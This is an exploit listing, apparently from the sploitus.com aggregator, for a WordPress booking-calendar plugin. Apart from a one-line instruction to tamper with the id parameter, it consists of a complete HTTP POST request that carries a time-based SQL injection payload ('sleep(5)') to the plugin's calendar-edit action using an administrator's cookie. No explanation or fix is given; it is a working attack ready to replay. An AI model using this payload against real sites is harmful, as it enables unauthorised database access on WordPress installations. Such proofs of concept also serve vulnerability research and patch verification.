Share
## https://sploitus.com/exploit?id=WPEX-ID:C5569317-B8C8-4524-8375-3E2369BDCC68
Edit an existing Seasons & Calendars (/wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars) and tamper the id parameter

POST /wp-admin/admin-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
Origin: http://192.168.9.32
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

action=abc_booking_editCalendar&id=1+and+sleep(5)&name=test&maxAvailabilities=1&maxUnits=5&pricePreset=9000&minimumStayPreset=1&partlyBooked=1&page_id=0&infotext=